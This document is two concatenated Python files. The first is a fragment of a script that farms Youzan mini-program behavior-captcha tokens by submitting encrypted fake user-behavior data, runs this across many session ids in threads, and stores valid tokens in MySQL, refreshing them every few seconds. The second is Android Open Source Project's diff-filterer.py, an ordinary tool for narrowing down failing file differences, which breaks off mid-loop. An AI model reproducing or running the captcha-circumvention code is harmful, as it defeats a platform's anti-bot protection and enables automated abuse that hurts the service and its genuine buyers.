'Extra-Data': '{"sid":"%s","clientType":"weapp-miniprogram","version":"2.87.8","client":"weapp","bizEnv":"wsc"}' % sid,
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.9(0x18000929) NetType/WIFI Language/zh_CN'
}
return headers
# 验证码生成器
def captcha_creater(sid):
get_url = 'https://uic.youzan.com/passport/api/captcha/get-behavior-captcha-token-v2.json?app_id=wxdcc11cd7703c0e8d&kdt_id=44077958&access_token=&bizType=158&version=1.0'
check_url = 'https://uic.youzan.com/passport/api/captcha/check-behavior-captcha-data.json?app_id=wxdcc11cd7703c0e8d&kdt_id=44077958&access_token='
headers = header(sid)
r = requests.get(url=get_url, headers=headers)
try:
r = r.json()
token = r['data']['token']
rdmstr = r['data']['randomStr']
en_data = encrypt.encrypt(rdmstr)
check_data = {
"captchaType": 2,
"token": token,
"bizType": 158,
"bizData": "{\"platform\":\"weapp\",\"buyer_id\":,\"order_receiver_phone\":\"\",\"book_key\":\"\",\"kdtId\":%s}" % kdt_id,
"userBehaviorData": en_data
}
r = requests.post(url=check_url, headers=headers,
data=json.dumps(check_data))
result = r.json()['data']['success']
if result:
captcha_map[sid] = token
print('验证码生成完毕')
else:
print('验证码生成错误')
captcha_map[sid] = ''
except Exception as e:
print(e)
captcha_map[sid] = ''
# 多线程生成验证码
def make_captchas(sids: list):
threads = []
for sid in sids:
thread = threading.Thread(target=captcha_creater(sid))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# 生成验证码并存入数据库
def cpt():
make_captchas(sid_list)
push_to_mysql()
# 验证码存入数据库,数据库参数自行更改
def push_to_mysql():
db = pymysql.connect(host='', port=3306, user='', password='', database='')
cursor = db.cursor()
select_sql = 'SELECT sid FROM 验证码table'
cursor.execute(select_sql)
_init_sid = cursor.fetchall()
init_sid = [_[0] for _ in _init_sid]
for sid in init_sid:
if sid not in sid_list:
delete_sql = 'DELETE FROM 验证码table WHERE sid=%s'
cursor.execute(delete_sql, sid)
db.commit()
for sid in captcha_map:
if sid in init_sid:
add_sql = 'UPDATE 验证码table SET captcha=%s WHERE sid=%s'
cursor.execute(add_sql, (captcha_map[sid], sid))
db.commit()
else:
add_sql = 'INSERT INTO 验证码table (No,captcha,sid) VALUES (null,%s,%s)'
cursor.execute(add_sql, (captcha_map[sid], sid))
db.commit()
cursor.close()
db.close()
print('\n验证码更新完成\n')
# 监控验证码是否有效
def refresh():
db = pymysql.connect(host='', port=3306, user='', password='', database='')
cursor = db.cursor()
emergency_list = []
select_sql = 'SELECT * FROM 验证码table'
cursor.execute(select_sql)
_ = cursor.fetchall()
captchas = [[i[1], i[2]] for i in _]
for _ in captchas:
if _[1] == '0':
emergency_list.append(_)
cursor.close()
db.close()
if emergency_list: # 如果验证码为空,则马上生成
print('emergency!')
cpt()
if __name__ == '__main__':
cpt()
schedule.every(1).seconds.do(refresh) # 每秒刷新验证码有效性
schedule.every(15).seconds.do(cpt) # 每十五秒生成验证码
while True:
schedule.run_pending()
time.sleep(0.01)
|
diff-filterer.py
|
#!/usr/bin/python3
#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime, filecmp, math, multiprocessing, os, shutil, subprocess, stat, sys, time
from collections import OrderedDict
def usage():
print("""Usage: diff-filterer.py [--assume-no-side-effects] [--assume-input-states-are-correct] [--work-path <workpath>] [--num-jobs <count>] [--timeout <seconds>] [--debug] <passingPath> <failingPath> <shellCommand>
diff-filterer.py attempts to transform (a copy of) the contents of <passingPath> into the contents of <failingPath> subject to the constraint that when <shellCommand> is run in that directory, it returns 0
OPTIONS
--assume-no-side-effects
Assume that the given shell command does not make any (relevant) changes to the given directory, and therefore don't wipe and repopulate the directory before each invocation of the command
--assume-input-states-are-correct
Assume that <shellCommand> passes in <passingPath> and fails in <failingPath> rather than re-verifying this
--work-path <filepath>
File path to use as the work directory for testing the shell command
This file path will be overwritten and modified as needed for testing purposes, and will also be the working directory of the shell command when it is run
--num-jobs <count>
The maximum number of concurrent executions of <shellCommand> to spawn at once
Specify 'auto' to have diff-filterer.py dynamically adjust the number of jobs based on system load
--timeout <seconds>
Approximate maximum amount of time to run. If diff-filterer.py expects that running a test would exceed this timeout, then it will skip running the test, terminate early, and report what it did find.
diff-filterer.py doesn't terminate any child processes that have already started, so it is still possible that diff-filterer.py might exceed this timeout by the amount of time required to run one test.
--debug
Enable some debug checks in diff-filterer.py
""")
sys.exit(1)
debug = False
# Miscellaneous file utilities
class FileIo(object):
def __init__(self):
return
def ensureDirExists(self, filePath):
if not os.path.isdir(filePath):
if os.path.isfile(filePath) or os.path.islink(filePath):
os.remove(filePath)
os.makedirs(filePath)
def copyFile(self, fromPath, toPath):
self.ensureDirExists(os.path.dirname(toPath))
self.removePath(toPath)
if os.path.islink(fromPath):
linkText = os.readlink(fromPath)
os.symlink(linkText, toPath)
else:
shutil.copy2(fromPath, toPath)
def hardLink(self, oldPath, newPath):
self.ensureDirExists(os.path.dirname(newPath))
self.removePath(newPath)
os.link(oldPath, newPath)
def writeFile(self, path, text):
f = open(path, "w+")
f.write(text)
f.close()
def writeScript(self, path, text):
self.writeFile(path, text)
os.chmod(path, stat.S_IRWXU)
def removePath(self, filePath):
if len(os.path.split(filePath)) < 2:
raise Exception("Will not remove path at " + filePath + "; is too close to the root of the filesystem")
if os.path.islink(filePath):
os.remove(filePath)
elif os.path.isdir(filePath):
shutil.rmtree(filePath)
elif os.path.isfile(filePath):
os.remove(filePath)
def join(self, path1, path2):
return os.path.normpath(os.path.join(path1, path2))
# tells whether <parent> either contains <child> or is <child>
def contains(self, parent, child):
if parent == child:
return True
return child.startswith(parent + "/")
# returns the common prefix of two paths. For example, commonPrefixOf2("a/b/c", "a/b/cat") returns "a/b"
def commonPrefixOf2(self, path1, path2):
prefix = path2
while True:
if self.contains(prefix, path1):
return prefix
parent = os.path.dirname(prefix)
if parent == prefix:
return None
prefix = parent
# returns the common prefix of multiple paths
def commonPrefix(self, paths):
if len(paths) < 1:
return None
result = None
for path in paths:
if result is None:
# first iteration
result = path
else:
prev = result
result = self.commonPrefixOf2(result, path)
if result is None:
# the common prefix of two paths was nothing
return result
return result
fileIo = FileIo()
# Returns cpu usage
class CpuStats(object):
def cpu_times_percent(self):
# We wait to attempt to import psutil in case we don't need it and it doesn't exist on this system
import psutil
return psutil.cpu_times_percent(interval=None)
cpuStats = CpuStats()
# Fast file copying
class FileCopyCache(object):
def __init__(self):
self.modificationTimes = {}
# Puts a copy of <sourcePath> at <destPath>
# If we already have an unmodified copy, we just hardlink our existing unmodified copy
# If we don't have an unmodified copy, we first make a copy
def copyFile(self, sourcePath, destPath, cachePath):
if cachePath is None:
fileIo.copyFile(sourcePath, destPath)
else:
shareable = self.getShareableFile(sourcePath, cachePath)
fileIo.hardLink(shareable, destPath)
# gets a shareable copy of <sourcePath> in <cachePath> and returns its path
def getShareableFile(self, sourcePath, cachePath):
# note that absolute sourcePath is supported
path = os.path.abspath(cachePath + "/" + sourcePath)
if path in self.modificationTimes:
# we've already shared this file before; let's check whether it has been modified since then
if self.modificationTimes[path] == self.getModificationTime(path):
# this file hasn't been modified since we last shared it; we can just reuse it
return path
# we don't have an existing file that we can reuse, so we have to make one
fileIo.copyFile(sourcePath, path)
self.modificationTimes[path] = self.getModificationTime(path)
return path
# returns the time at which <path> was last modified
def getModificationTime(self, path):
if os.path.exists(path):
return os.path.getmtime(path)
return None
fileCopyCache = FileCopyCache()
# Runs a shell command
class ShellScript(object):
def __init__(self, commandText, cwd):
self.commandText = commandText
self.cwd = cwd
def process(self):
cwd = self.cwd
print("Running '" + self.commandText + "' in " + cwd)
try:
subprocess.check_call(["bash", "-c", "cd " + cwd + " && " + self.commandText])
return 0
except subprocess.CalledProcessError as e:
return e.returncode
# Base class that can hold the state of a file
class FileContent(object):
def apply(self, filePath, cachePath=None):
pass
def equals(self, other, checkWithFileSystem=False):
pass
# A FileContent that refers to the content of a specific file
class FileBacked_FileContent(FileContent):
def __init__(self, referencePath):
super(FileBacked_FileContent, self).__init__()
self.referencePath = referencePath
self.isLink = os.path.islink(self.referencePath)
def apply(self, filePath, cachePath=None):
fileCopyCache.copyFile(self.referencePath, filePath, cachePath)
def equals(self, other, checkWithFileSystem=False):
if not isinstance(other, FileBacked_FileContent):
return False
if self.referencePath == other.referencePath:
return True
if not checkWithFileSystem:
return False
if self.isLink and other.isLink:
return os.readlink(self.referencePath) == os.readlink(other.referencePath)
if self.isLink != other.isLink:
return False # symlink not equal to non-symlink
return filecmp.cmp(self.referencePath, other.referencePath)
def __str__(self):
return self.referencePath
# A FileContent describing the nonexistence of a file
class MissingFile_FileContent(FileContent):
def __init__(self):
super(MissingFile_FileContent, self).__init__()
def apply(self, filePath, cachePath=None):
fileIo.removePath(filePath)
def equals(self, other, checkWithFileSystem=False):
return isinstance(other, MissingFile_FileContent)
def __str__(self):
return "Empty"
# A FileContent describing a directory
class Directory_FileContent(FileContent):
def __init__(self):
super(Directory_FileContent, self).__init__()
def apply(self, filePath, cachePath=None):
fileIo.ensureDirExists(filePath)
def equals(self, other, checkWithFileSystem=False):
return isinstance(other, Directory_FileContent)
def __str__(self):
return "[empty dir]"
# A collection of many FileContent objects
class FilesState(object):
def __init__(self):
self.fileStates = OrderedDict()
def apply(self, filePath, cachePath=None):
for relPath, state in self.fileStates.items():
state.apply(fileIo.join(filePath, relPath), cachePath)
def add(self, filePath, fileContent):
self.fileStates[filePath] = fileContent
def addAllFrom(self, other):
for filePath in other.fileStates:
self.add(filePath, other.fileStates[filePath])
def getContent(self, filePath):
if filePath in self.fileStates:
return self.fileStates[filePath]
return None
def getKeys(self):
return self.fileStates.keys()
# returns a FilesState resembling <self> but without the keys for which other[key] == self[key]
def withoutDuplicatesFrom(self, other, checkWithFileSystem=False):
result = FilesState()
for filePath, fileState in self.fileStates.items():
otherContent = other.getContent(filePath)
if not fileState.equals(otherContent, checkWithFileSystem):
result.add(filePath, fileState)
return result
# returns self[fromIndex:toIndex]
def slice(self, fromIndex, toIndex):
result = FilesState()
for filePath in list(self.fileStates.keys())[fromIndex:toIndex]:
result.fileStates[filePath] = self.fileStates[filePath]
return result
def restrictedToKeysIn(self, other):
result = FilesState()
for filePath, fileState in self.fileStates.items():
if filePath in other.fileStates:
result.add(filePath, fileState)
return result
# returns a FilesState having the same keys as this FilesState, but with values taken from <other> when it has them, and <self> otherwise
def withConflictsFrom(self, other, listEmptyDirs = False):
result = FilesState()
for filePath, fileContent in self.fileStates.items():
if filePath in other.fileStates:
result.add(filePath, other.fileStates[filePath])
else:
result.add(filePath, fileContent)
if listEmptyDirs:
oldImpliedDirs = self.listImpliedDirs()
newImpliedDirs = result.listImpliedDirs()
for impliedDir in oldImpliedDirs:
if impliedDir not in newImpliedDirs and impliedDir not in result.fileStates:
result.add(impliedDir, MissingFile_FileContent())
return result
def checkSameKeys(self, other):
a = self.checkContainsKeys(other)
b = other.checkContainsKeys(self)
if a and b:
return True
if not a:
print("a does not contain all of the keys from b")
if not b:
print("b does not contain all of the keys from a")
return False
def checkContainsKeys(self, other):
contains = True
for f in other.fileStates.keys():
if f not in self.fileStates:
print("Found in " + other.summarize() + " but not in " + self.summarize() + ": " + f)
contains = False
return contains
# returns a set of paths to all of the dirs in <self> that are implied by any files in <self>
def listImpliedDirs(self):
dirs = set()
empty = MissingFile_FileContent()
keys = [key for (key, value) in self.fileStates.items() if not empty.equals(value)]
i = 0
while i < len(keys):
path = keys[i]
parent, child = os.path.split(path)
if parent == "":
parent = "."
if not parent in dirs:
dirs.add(parent)
keys.append(parent)
i += 1
return dirs
# returns a FilesState having all of the entries from <self>, plus empty entries for any keys in <other> not in <self>
def expandedWithEmptyEntriesFor(self, other):
impliedDirs = self.listImpliedDirs()
# now look for entries in <other> not present in <self>
result = self.clone()
for filePath in other.fileStates:
if filePath not in result.fileStates and filePath not in impliedDirs:
result.fileStates[filePath] = MissingFile_FileContent()
return result
def clone(self):
result = FilesState()
for path, content in self.fileStates.items():
result.add(path, content)
return result
def withoutEmptyEntries(self):
result = FilesState()
empty = MissingFile_FileContent()
for path, state in self.fileStates.items():
if not empty.equals(state):
result.add(path, state)
return result
def getCommonDir(self):
result = fileIo.commonPrefix(self.fileStates.keys())
return result
# Returns a list of FilesState objects each containing a different subdirectory of <self>
# If groupDirectFilesTogether == True, then all files directly under self.getCommonDir() will be assigned to the same group
def groupByDirs(self, groupDirectFilesTogether = False):
if len(self.fileStates) <= 1:
if len(self.fileStates) == 1:
return [self]
return []
commonDir = self.getCommonDir()
if commonDir is None:
prefixLength = 0
else:
prefixLength = len(commonDir) + 1 # skip the following '/'
groupsByDir = {}
for filePath, fileContent in self.fileStates.items():
subPath = filePath[prefixLength:]
slashIndex = subPath.find("/")
if slashIndex < 0:
if groupDirectFilesTogether:
firstDir = ""
else:
firstDir = subPath
else:
firstDir = subPath[:slashIndex]
if not firstDir in groupsByDir:
groupsByDir[firstDir] = FilesState()
groupsByDir[firstDir].add(filePath, fileContent)
return [group for group in groupsByDir.values()]
# splits into multiple, smaller, FilesState objects
def splitOnce(self, maxNumChildren = 2):
if self.size() <= 1:
return [self]
children = self.groupByDirs(True)
if len(children) == 1:
children = children[0].groupByDirs(False)
if len(children) > maxNumChildren:
# If there are lots of child directories, we still want to test a smaller number of larger groups before testing smaller groups
# So we arbitrarily recombine child directories to make a smaller number of children
minIndex = 0
mergedChildren = []
for i in range(maxNumChildren):
maxIndex = len(children) * (i + 1) // maxNumChildren
merge = FilesState()
for child in children[minIndex:maxIndex]:
merge.addAllFrom(child)
mergedChildren.append(merge)
minIndex = maxIndex
children = mergedChildren
return children
def summarize(self):
numFiles = self.size()
commonDir = self.getCommonDir()
if numFiles <= 4:
return str(self)
if commonDir is not None:
return str(numFiles) + " files under " + str(commonDir)
return str(numFiles) + " files"
def size(self):
return len(self.fileStates)
def __str__(self):
if len(self.fileStates) == 0:
return "[empty fileState]"
entries = []
for filePath, state in self.fileStates.items():
entries.append(filePath + " -> " + str(state))
if len(self.fileStates) > 1:
prefix = str(len(entries)) + " entries:\n"
else:
prefix = "1 entry: "
return prefix + "\n".join(entries)
# Creates a FilesState matching the state of a directory on disk
def filesStateFromTree(rootPath):
rootPath = os.path.abspath(rootPath)
paths = []
states = {}
for root, dirPaths, filePaths in os.walk(rootPath, topdown=True):
if len(filePaths) == 0 and len(dirPaths) == 0:
relPath = os.path.relpath(root, rootPath)
paths.append(relPath)
states[relPath] = Directory_FileContent()
# include every file and every symlink (even if the symlink points to a dir)
leaves = filePaths
for dirPath in dirPaths:
fullPath = os.path.join(root, dirPath)
if os.path.islink(fullPath):
leaves.append(dirPath)
for filePath in leaves:
fullPath = fileIo.join(root, filePath)
relPath = os.path.relpath(fullPath, rootPath)
paths.append(relPath)
states[relPath] = FileBacked_FileContent(fullPath)
paths = sorted(paths)
state = FilesState()
for path in paths:
state.add(path, states[path])
return state
# runs a Job in this process
def runJobInSameProcess(shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, twoWayPipe):
job = Job(shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, twoWayPipe)
job.runAndReport()
# starts a Job in a new process
def runJobInOtherProcess(shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, queue, identifier):
parentWriter, childReader = multiprocessing.Pipe()
childInfo = TwoWayPipe(childReader, queue, identifier)
process = multiprocessing.Process(target=runJobInSameProcess, args=(shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, childInfo,))
process.start()
return parentWriter
class TwoWayPipe(object):
def __init__(self, readerConnection, writerQueue, identifier):
self.readerConnection = readerConnection
self.writerQueue = writerQueue
self.identifier = identifier
# Stores a subprocess for running tests and some information about which tests to run
class Job(object):
def __init__(self, shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, twoWayPipe):
# the test to run
self.shellCommand = shellCommand
# directory to run the test in
self.workPath = workPath
# the state of our working directory
self.originalState = originalState
# whether to assume that the test won't change anything important
self.assumeNoSideEffects = assumeNoSideEffects
# the best accepted state
self.full_resetTo_state = full_resetTo_state
# the changes we're considering
self.testState = testState
self.pipe = twoWayPipe
self.cachePath = cachePath
def runAndReport(self):
succeeded = False
postState = None
try:
(succeeded, postState) = self.run()
finally:
print("^" * 100)
self.pipe.writerQueue.put((self.pipe.identifier, succeeded, postState))
def run(self):
print("#" * 100)
print("Checking " + self.testState.summarize() + " (job " + str(self.pipe.identifier) + ") in " + str(self.workPath) + " at " + str(datetime.datetime.now()))
# compute the state that we want the files to be in before we start the test
fullStateToTest = self.full_resetTo_state.expandedWithEmptyEntriesFor(self.testState).withConflictsFrom(self.testState, True)
#print("Starting with original worker state of " + str(self.originalState))
# update our files on disk to match the state we want to test
fullStateToTest.expandedWithEmptyEntriesFor(self.originalState).withoutDuplicatesFrom(self.originalState).apply(self.workPath)
# run test
testStartSeconds = time.time()
testStart = datetime.datetime.now()
returnCode = ShellScript(self.shellCommand, self.workPath).process()
testEnd = datetime.datetime.now()
duration = (testEnd - testStart).total_seconds()
if self.assumeNoSideEffects:
# assume that no relevant files changed
postState = fullStateToTest
else:
# determine which files weren't changed by the test command
postState = filesStateFromTree(self.workPath)
for key in postState.getKeys():
modified = postState.getContent(key)
if isinstance(modified, FileBacked_FileContent):
# If any filepath wasn't modified since the start of the test, then its content matches the original
# (If the content is known to match the original, we won't have to reset it next time)
if os.path.getmtime(modified.referencePath) < testStartSeconds:
original = fullStateToTest.getContent(key)
if original is not None:
if isinstance(original, FileBacked_FileContent):
modified.referencePath = original.referencePath
# report results
if returnCode == 0:
print("Passed: " + self.testState.summarize() + " (job " + str(self.pipe.identifier) + ") at " + str(datetime.datetime.now()) + " in " + str(duration))
return (True, postState)
else:
print("Failed: " + self.testState.summarize() + " (job " + str(self.pipe.identifier) + ") at " + str(datetime.datetime.now()) + " in " + str(duration))
return (False, postState)
# Runner class that determines which diffs between two directories cause the given shell command to fail
class DiffRunner(object):
def __init__(self, failingPath, passingPath, shellCommand, workPath, assumeNoSideEffects, assumeInputStatesAreCorrect, maxNumJobsAtOnce, timeoutSeconds):
# some simple params
self.workPath = os.path.abspath(workPath)
self.bestState_path = fileIo.join(self.workPath, "bestResults")
self.sampleFailure_path = fileIo.join(self.workPath, "sampleFailure")
self.testScript_path = fileIo.join(self.workPath, "test.sh")
fileIo.ensureDirExists(os.path.dirname(self.testScript_path))
fileIo.writeScript(self.testScript_path, shellCommand)
self.originalPassingPath = os.path.abspath(passingPath)
self.originalFailingPath = os.path.abspath(failingPath)
self.assumeNoSideEffects = assumeNoSideEffects
self.assumeInputStatesAreCorrect = assumeInputStatesAreCorrect
self.timeoutSeconds = timeoutSeconds
# lists of all the files under the two dirs
print("Finding files in " + passingPath)
self.originalPassingState = filesStateFromTree(passingPath)
print("Found " + self.originalPassingState.summarize() + " in " + str(passingPath))
print("")
print("Finding files in " + failingPath)
self.originalFailingState = filesStateFromTree(failingPath)
print("Found " + self.originalFailingState.summarize() + " in " + str(failingPath))
print("")
print("Identifying duplicates")
# list of the files in the state to reset to after each test
self.full_resetTo_state = self.originalPassingState
# minimal description of only the files that are supposed to need to be reset after each test
self.resetTo_state = self.originalPassingState.expandedWithEmptyEntriesFor(self.originalFailingState).withoutDuplicatesFrom(self.originalFailingState, True)
self.targetState = self.originalFailingState.expandedWithEmptyEntriesFor(self.originalPassingState).withoutDuplicatesFrom(self.originalPassingState, True)
self.originalNumDifferences = self.resetTo_state.size()
print("Processing " + str(self.originalNumDifferences) + " file differences")
self.maxNumJobsAtOnce = maxNumJobsAtOnce
def cleanupTempDirs(self):
print("Clearing work directories")
numAttempts = 3
for attempt in range(numAttempts):
if os.path.isdir(self.workPath):
for child in os.listdir(self.workPath):
if child.startswith("job-"):
path = os.path.join(self.workPath, child)
try:
fileIo.removePath(path)
except IOError as e:
if attempt >= numAttempts - 1:
raise Exception("Failed to remove " + path, e)
fileIo.removePath(os.path.join(self.workPath, "caches"))
def runnerTest(self, testState, timeout = None):
workPath = self.getWorkPath(0)
# reset state if needed
fileIo.removePath(workPath)
testState.apply(workPath)
start = datetime.datetime.now()
returnCode = ShellScript(self.testScript_path, workPath).process()
duration = (datetime.datetime.now() - start).total_seconds()
print("shell command completed in " + str(duration))
if returnCode == 0:
return (True, duration)
else:
if self.assumeNoSideEffects:
# unapply changes so that the contents of workPath should match self.resetTo_state
testState.withConflictsFrom(self.resetTo_state).apply(workPath)
return (False, duration)
def onSuccess(self, testState):
#print("Runner received success of testState: " + str(testState.summarize()))
if debug:
if not filesStateFromTree(self.bestState_path).checkSameKeys(self.full_resetTo_state.withoutEmptyEntries()):
print("Contents of " + self.bestState_path + " don't match self.full_resetTo_state at beginning of onSuccess")
sys.exit(1)
self.targetState = self.targetState.withoutDuplicatesFrom(testState)
self.resetTo_state = self.resetTo_state.withConflictsFrom(testState).withoutDuplicatesFrom(testState)
delta = self.full_resetTo_state.expandedWithEmptyEntriesFor(testState).withConflictsFrom(testState, True).withoutDuplicatesFrom(self.full_resetTo_state)
delta.apply(self.bestState_path)
self.full_resetTo_state = self.full_resetTo_state.expandedWithEmptyEntriesFor(delta).withConflictsFrom(delta)
if debug:
if not filesStateFromTree(self.bestState_path).checkSameKeys(self.full_resetTo_state.withoutEmptyEntries()):
print("Contents of " + self.bestState_path + " don't match self.full_resetTo_state at end of onSuccess")
print("Applied this delta: " + str(delta))
sys.exit(1)
def getWorkPath(self, jobId):
return os.path.join(self.workPath, "job-" + str(jobId))
def getFilesCachePath(self, jobId):
return os.path.join(self.workPath, "caches", "job-" + str(jobId))
def run(self):
start = datetime.datetime.now()
numIterationsCompleted = 0
self.cleanupTempDirs()
workPath = self.getWorkPath(0)
if not self.assumeInputStatesAreCorrect:
print("Testing that the given failing state actually fails")
fileIo.removePath(workPath)
if self.runnerTest(self.originalFailingState)[0]:
print("\nGiven failing state at " + self.originalFailingPath + " does not actually fail!")
return False
# clean up temporary dirs in case any daemons remain running
self.cleanupTempDirs()
print("Testing that the given passing state actually passes")
if not self.runnerTest(self.full_resetTo_state)[0]:
print("\nGiven passing state at " + self.originalPassingPath + " does not actually pass!")
return False
# clean up temporary dirs in case any daemons remain running
self.cleanupTempDirs()
print("Saving best state found so far")
fileIo.removePath(self.bestState_path)
self.full_resetTo_state.apply(self.bestState_path)
print("Starting")
print("You can inspect " + self.bestState_path + " while this process runs, to observe the best state discovered so far")
print("You can inspect " + self.sampleFailure_path + " while this process runs, to observe a state for which the test failed. If you delete this filepath, then it will be updated later to contain a new failing state")
print("")
# Now we search over groups of inodes (files or dirs) in the tree
# Every time we encounter a group of inodes, we try replacing them and seeing if the replacement passes our test
# If it does, we accept those changes and continue searching
# If it doesn't, we split that group into smaller groups and continue
jobId = 0
workingDir = self.getWorkPath(jobId)
queue = multiprocessing.Queue()
activeTestStatesById = {}
workerStatesById = {}
initialSplitSize = 2
if self.maxNumJobsAtOnce != "auto" and self.maxNumJobsAtOnce > 2:
initialSplitSize = self.maxNumJobsAtOnce
availableTestStates = self.targetState.splitOnce(initialSplitSize)
numConsecutiveFailures = 0
numFailuresSinceLastSplitOrSuccess = 0
numCompletionsSinceLastPoolSizeChange = 0
invalidatedIds = set()
probablyAcceptableStates = []
numCompletedTests = 2 # Already tested initial passing state and initial failing state
numJobsAtFirstSuccessAfterMerge = None
timedOut = False
# continue until all files fail and no jobs are running
while (numFailuresSinceLastSplitOrSuccess < self.resetTo_state.size() and not timedOut) or len(activeTestStatesById) > 0:
# display status message
now = datetime.datetime.now()
elapsedDuration = now - start
minNumTestsRemaining = sum([math.log(box.size(), 2) + 1 for box in availableTestStates + list(activeTestStatesById.values())]) - numFailuresSinceLastSplitOrSuccess
estimatedNumTestsRemaining = max(minNumTestsRemaining, 1)
if numConsecutiveFailures >= 4 and numFailuresSinceLastSplitOrSuccess < 1:
# If we are splitting often and failing often, then we probably haven't yet
# shrunken the individual boxes down to each contain only one failing file
# During this phase, on average we've completed half of the work
# So, we estimate that the total work remaining is double what we've completed
estimatedNumTestsRemaining *= 2
estimatedRemainingDuration = datetime.timedelta(seconds = elapsedDuration.total_seconds() * float(estimatedNumTestsRemaining) / float(numCompletedTests))
message = "Elapsed duration: " + str(elapsedDuration) + ". Waiting for " + str(len(activeTestStatesById)) + " active subprocesses (" + str(len(availableTestStates) + len(activeTestStatesById)) + " total available jobs). " + str(self.resetTo_state.size()) + " changes left to test, should take about " + str(estimatedNumTestsRemaining) + " tests, about " + str(estimatedRemainingDuration)
print(message)
if self.timeoutSeconds is not None:
# what fraction of the time is left
remainingTimeFraction = 1.0 - (elapsedDuration.total_seconds() / self.timeoutSeconds)
# how many jobs there will be if we add another one
possibleNumPendingJobs = len(activeTestStatesById) + 1
if possibleNumPendingJobs / (numCompletedTests + possibleNumPendingJobs) > remainingTimeFraction:
# adding one more job would be likely to cause us to exceed our time limit
timedOut = True
if len(activeTestStatesById) > 0:
# wait for a response from a worker
identifier, didAcceptState, workerNewState = queue.get()
box = activeTestStatesById[identifier]
#print("main process received worker new state of " + str(workerNewState))
workerStatesById[identifier] = workerNewState
numCompletedTests += 1
numCompletionsSinceLastPoolSizeChange += 1
if didAcceptState:
numConsecutiveFailures = 0
numFailuresSinceLastSplitOrSuccess = 0
acceptedState = box #.getAllFiles()
#print("Succeeded : " + acceptedState.summarize() + " (job " + str(identifier) + ") at " + str(datetime.datetime.now()))
maxRunningSize = max([state.size() for state in activeTestStatesById.values()])
maxRelevantSize = maxRunningSize / len(activeTestStatesById)
if acceptedState.size() < maxRelevantSize:
print("Queuing a retest of response of size " + str(acceptedState.size()) + " from job " + str(identifier) + " because a much larger job of size " + str(maxRunningSize) + " is still running")
probablyAcceptableStates.append(acceptedState)
else:
if identifier in invalidatedIds:
# queue a retesting of this box
print("Queuing a re-test of response from job " + str(identifier) + " due to previous invalidation. Successful state: " + str(acceptedState.summarize()))
probablyAcceptableStates.append(acceptedState)
else:
# A worker discovered a nonempty change that can be made successfully; update our best accepted state
self.onSuccess(acceptedState)
if debug:
# The files in self.bestState_path should exactly match what's in workPath[identifier], except for files that didn't originally exist
if not filesStateFromTree(self.bestState_path).checkSameKeys(filesStateFromTree(self.getWorkPath(identifier)).restrictedToKeysIn(self.originalPassingState.expandedWithEmptyEntriesFor(self.originalFailingState))):
print("Successful state from work path " + str(identifier) + " wasn't correctly copied to bestState. Could the test command be deleting files that previously existed?")
sys.exit(1)
# record that the results from any previously started process are no longer guaranteed to be valid
for i in activeTestStatesById.keys():
if i != identifier:
invalidatedIds.add(i)
# record our first success
if numJobsAtFirstSuccessAfterMerge is None:
numJobsAtFirstSuccessAfterMerge = len(availableTestStates)
else:
if not os.path.isdir(self.sampleFailure_path):
# save sample failure path where user can see it
print("Saving sample failed state to " + str(self.sampleFailure_path))
fileIo.ensureDirExists(self.sampleFailure_path)
self.full_resetTo_state.expandedWithEmptyEntriesFor(box).withConflictsFrom(box, True).apply(self.sampleFailure_path)
#print("Failed : " + box.summarize() + " (job " + str(identifier) + ") at " + str(datetime.datetime.now()))
# count failures
numConsecutiveFailures += 1
numFailuresSinceLastSplitOrSuccess += 1
# find any children that failed and queue a re-test of those children
updatedChild = box.withoutDuplicatesFrom(box.withConflictsFrom(self.resetTo_state))
if updatedChild.size() > 0:
if numConsecutiveFailures >= 4:
# Suppose we are trying to identify n single-file changes that cause failures
# Suppose we have tried c changes of size s, each one of which failed
# We conclude that n >= c
# A mostly unbiased estimate of c as a function of n is that c = n / 2
# Similarly, a mostly unbiased estimate of n is that n = c * 2
# We want to choose a new number of changes to test, c2, such that running c2 tests results in efficiently identifying the relevant n changes
# Let's set c2 = 2 * n = 2 * 2 * c
splitFactor = 4
else:
# After we reach a sufficiently small change size such that some changes start passing,
# Then we assume that we've probably narrowed down to each individual failing change,
# And we can increase block sizes more slowly
splitFactor = 2
split = updatedChild.splitOnce(splitFactor)
if len(split) > 1:
numFailuresSinceLastSplitOrSuccess = 0
availableTestStates += split
# clear invalidation status
if identifier in invalidatedIds:
invalidatedIds.remove(identifier)
del activeTestStatesById[identifier]
# Check whether we've had enough failures lately to warrant checking for the possibility of dependencies among files
if numJobsAtFirstSuccessAfterMerge is not None:
if len(availableTestStates) > 3 * numJobsAtFirstSuccessAfterMerge:
# It's plausible that every file in one directory depends on every file in another directory
# If this happens, then after we delete the dependent directory, we can delete the dependency directory too
# To make sure that we consider deleting the dependency directory, we recombine all of our states and start splitting from there
print("#############################################################")
print("# #")
print("# Lots of failures since first success!!!!!!!!!!!!!!!!!!!!! #")
print("# Recombining all states in case we uncovered a dependency! #")
print("# #")
print("#############################################################")
rejoinedState = FilesState()
for state in availableTestStates:
rejoinedState = rejoinedState.expandedWithEmptyEntriesFor(state).withConflictsFrom(state)
rejoinedState = rejoinedState.withoutDuplicatesFrom(self.resetTo_state)
availableTestStates = rejoinedState.splitOnce(initialSplitSize)
numFailuresSinceLastSplitOrSuccess = 0
numJobsAtFirstSuccessAfterMerge = None
numCompletionsSinceLastPoolSizeChange = 0
# if probablyAcceptableStates has become large enough, then retest its contents too
